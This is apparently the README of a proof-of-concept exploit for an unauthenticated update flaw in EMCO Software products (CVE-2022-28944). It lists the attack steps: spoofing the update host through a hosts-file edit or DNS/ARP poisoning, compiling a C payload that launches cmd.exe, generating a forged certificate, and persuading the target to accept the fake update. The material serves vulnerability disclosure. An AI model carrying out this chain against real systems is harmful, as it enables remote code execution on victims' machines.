EMCO Software Multiple Products Unauthenticated Update Remote Code Execution Vulnerability.
Usage: python3 cve-2022-28944_poc.py
Details in the report at gerr.re.
- Install an affected product of EMCO Software;
- Set spoof
storage.emcosoftware.comto our attacker ip;- For a proof-of-concept edit
c:\windows\system32\drivers\etc\hostson target.- Note: attackers may e.g. use:
- poorly configured routers/switches/DNS,
- DNS spoof / cache poisoning,
- ARP spoof / cache poisoning.
- Note: attackers may e.g. use:
- For a proof-of-concept edit
- Compile
proof.con the attacker, e.g. usingi686-w64-mingw32-gcc proof.c -o proof.exe;
#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}- Generate self-signed certificates;
- e.g. using
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"
- e.g. using
- Run the proof-of-concept script;
- Start the affected product of EMCO Software and either
- wait a day to trigger update automatically, or
- trigger the update manually through the application menu;
- Accept the update in the Update Wizard.
- Attackers will use a persuasive update description to convince a target to accept the update.